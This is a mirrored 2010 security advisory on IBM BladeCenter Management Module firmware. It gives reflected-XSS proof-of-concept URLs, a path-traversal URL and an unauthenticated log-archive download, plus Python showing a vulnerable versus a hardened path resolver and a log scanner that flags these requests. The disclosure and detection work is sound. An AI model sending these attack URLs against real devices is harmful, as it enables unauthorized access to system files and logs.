<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><title>IBM Bladecenter Management – Multiple vulnerabilities</title></head><body><pre>=====================================================
IBM Bladecenter Management – Multiple vulnerabilities
=====================================================

Application: IBM BladeCenter Management Module
Versions Affected: BPET48L (other firmware versions may also be affected)
Vendor URL: http://www-03.ibm.com/systems/bladecenter/
Bug: XSS, directory traversal, information disclosure
Exploits: YES
Reported: 05.09.2009
Vendor response: 09.09.2009
Solution: YES
Date of Public Advisory: 05.07.2010
Author: Sintsov Alexey
from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********

The BladeCenter management module is prone to multiple security vulnerabilities:

1 Dynamic (reflected) XSS
2 Directory listing via path traversal
3 Unauthorized access

Details
*******
1. Multiple reflected XSS vulnerabilities in the BladeCenter web management interface. The parameters shown below are echoed into the response without output encoding, so script supplied in the URL runs in the browser of whoever opens the link.

Examples
*******

http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert('XSS1');%3C/script%3E&amp;VLANID=&amp;IPADDR=3&gt;%3Cscript%3Ealert('XSS2');%3C/script%3E

http://[BLADECENTER]/private/power_management_policy_options.php?domain=3&lt;XSS&gt;

http://[BLADECENTER]/private/pm_temp.php?view=6&amp;mod_type=3&amp;slot=3&lt;XSS&gt;

http://[BLADECENTER]/private/power_module.php?view=4&amp;mod_type=4&amp;slot=3&lt;XSS&gt;

http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3&lt;XSS&gt;

http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3&lt;XSS&gt;&amp;save=1

2. Directory listing via path traversal in the BladeCenter web management interface

The attacker must be authenticated to the management module.

Examples
*******

http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc

The DIR parameter is not confined to the file manager's base directory, so an authenticated attacker can list and reach arbitrary files on the management module's operating system.
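
As an added illustration, not code from the advisory or from IBM's firmware: the flawed resolution of DIR next to a hardened one, in Python. The root directory /opt/mm/files, the function names and the behaviour of the vulnerable variant are assumptions made for the example; the advisory only documents the traversal string itself.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical directory that file_management.php is meant to expose; the
# advisory does not document the real root, so this value is an assumption.
FILE_ROOT = "/opt/mm/files"


def vulnerable_resolve(root, requested_dir):
    """Models the flawed behaviour: DIR is appended to the root and handed to
    the filesystem, so '..' segments walk out of the intended directory."""
    return posixpath.normpath(root + "/" + unquote(requested_dir))


def safe_resolve(root, requested_dir):
    """Hardened form: decode, treat DIR as relative, normalise, then require
    the result to stay under root. Returns the path, or None on escape."""
    root = posixpath.normpath(root)
    relative = unquote(requested_dir).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # Compare on a path-segment boundary so /opt/mm/files2 does not pass as
    # a child of /opt/mm/files.
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    attack = "/../../../tmp/etc"  # the DIR value from the advisory
    print(vulnerable_resolve(FILE_ROOT, attack))  # /tmp/etc
    print(safe_resolve(FILE_ROOT, attack))        # None
    print(safe_resolve(FILE_ROOT, "logs"))        # /opt/mm/files/logs
```

On a real filesystem the containment check should be applied to os.path.realpath of the candidate as well, so that a symlink inside the root cannot point outside it; posixpath is used here only so the example runs without touching disk.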

3. Unauthorized access

Sensitive data (system logs, core dumps) can be retrieved without authorization by requesting the archive directly:

Examples
*******

http://[BLADECENTER]/private/sdc.tgz
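
As an added check, not part of the DSecRG advisory or of IBM's code: a Python triage script that runs over the management module's web access log and flags requests matching the three issue classes above (reflected XSS payloads in the /private/ pages, '..' in the DIR parameter of file_management.php, and fetches of /private/sdc.tgz). The log lines are constructed for the example in common log format and mirror the advisory's URLs; the finding labels and the marker lists are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed sample access-log lines in common log format; not real traffic.
# The request targets mirror the paths and parameters named in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2009:10:01:02 +0000] "GET /private/blade_leds.php?WEBINDEX=3 HTTP/1.1" 200 5120
10.0.0.9 - - [05/Sep/2009:10:02:10 +0000] "GET /private/blade_leds.php?WEBINDEX=3%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200
10.0.0.9 - - [05/Sep/2009:10:02:41 +0000] "GET /private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert('XSS1');%3C/script%3E&VLANID=&IPADDR=3><script>alert('XSS2');</script> HTTP/1.1" 200 6100
10.0.0.9 - - [05/Sep/2009:10:03:44 +0000] "GET /private/file_management.php?DIR=/../../../tmp/etc HTTP/1.1" 200 8000
10.0.0.9 - - [05/Sep/2009:10:04:01 +0000] "GET /private/file_management.php?DIR=/logs HTTP/1.1" 200 3000
10.0.0.9 - - [05/Sep/2009:10:05:30 +0000] "GET /private/sdc.tgz HTTP/1.1" 200 2097152
10.0.0.7 - - [05/Sep/2009:10:06:00 +0000] "GET /private/ipmi_bladestatus.php?SLOT=3&save=1 HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Crude markup/script markers; enough to catch the advisory's payloads.
XSS_MARKERS = ("<", ">", "javascript:")
TRAVERSAL_PARAMS = {"/private/file_management.php": "DIR"}
UNAUTH_FILES = {"/private/sdc.tgz"}


def query_params(query):
    """Split a raw query string on '&' only. Older parse_qs versions also
    split on ';', which the advisory's alert('XSS1'); payloads contain."""
    for field in query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def classify_request(target):
    """Return finding labels for one request target (path plus query)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    findings = []
    if path in UNAUTH_FILES:
        findings.append("unauth-archive-download")
    if not path.startswith("/private/"):
        return findings
    for name, value in query_params(parts.query):
        # query_params decoded once; a second unquote catches double encoding.
        decoded = unquote(value)
        if TRAVERSAL_PARAMS.get(path) == name and ".." in decoded.split("/"):
            findings.append("directory-traversal")
        if any(m in decoded.lower() for m in XSS_MARKERS):
            findings.append("xss-attempt:" + name)
    return findings


def scan_log(text):
    """Parse CLF lines and return one record per request that has findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "target": m.group("target"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["findings"], hit["target"])
```

The XSS markers are deliberately broad (any angle bracket in a decoded parameter), which suits a retrospective hunt over a management interface that should never receive markup in its parameters; for a noisier application the marker list would need tightening.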

Solution
********

All three issues were fixed in firmware versions 4.7 and 5.0.

# <a href="http://inj3ct0r.com/">Inj3ct0r.com</a> [2010-07-06]</pre></body></html>
Source: http://inj3ct0r.com/exploits/13165